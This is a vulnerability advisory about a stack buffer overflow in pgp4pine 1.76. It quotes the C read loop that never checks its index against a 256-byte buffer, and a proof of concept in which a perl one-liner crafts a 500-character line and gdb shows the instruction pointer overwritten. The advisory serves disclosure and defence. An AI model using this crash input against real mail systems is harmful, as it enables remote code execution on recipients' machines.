|
|
|
|
| |
| PGP4Pine is a mail encryption/decryption/signature/verification wrapper to PGP for pine, it is called from pine to parse mail body and get PGP information from the file. A vulnerability in the product allows a remote attacker to send a malicious email that will cause the product to execute arbitrary code. |
| |
Credit:
The information has been provided by Eric AUGE.
|
| |
Vulnerable systems:
* pgp4pine version 1.76
When installed/configured within pine, PGP4Pine parses all incoming mail before pine will be allowed to open them. PGP4Pine looks for PGP tokens & information to allow decryption and confirmation of the sender's identity.
To verify incoming emails PGP4Pine calls:
menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
Which reads each line according to this loop:
[...]
char readline[CONSOLE_IO_LINE_LENGTH];
(where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
[...]
do {
fertig=0;
while (!fertig)
{
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
else if ((readline[i++]=c) == '\n')
{
readline[i]='\0';
fertig=1;
}
}
fertig=0;
if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
{
/* got signed message */
fclose(fin);
while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
fertig=1;
}
else if (strncmp("-----BEGIN PGP",readline,14)==0)
{
/* got another type of PGP message (encrypted, keys ...) */
fclose(fin);
fileDecrypt(inFile,outFile);
waitForReturn();
fertig=1;
}
else
i=0; /* Got waste line, reset i */
} while (!fertig);
[...]
As can be seen in the code, if a single line goes over 256 characters without having an EOF, the program will overwrite the saved environment variables in the stack and return address (this is due to the fact that there is no check on the index 'i' within the readline[] array):
[...]
}
else if ((readline[i++]=c) == '\n')
{
[...]
You can go over the CONSOLE_IO_LINE_LENGTH limit and replace the saved registers before getting to the condition that returns.
[...]
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
[...]
Exploit:
rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
Impact:
Since PGP4Pine process any incoming email, sending special crafted email can make sender execute arbitrary code on the recipient box when the mail is opened.
Workaround/Solutions:
Deactivate PGP4Pine and use another PGP wrapper for pine: http://pgpenvelope.sourceforge.net/ or http://www.megaloman.com/~hany/software/pinepgp/stable.html.
|
|
|
|
|
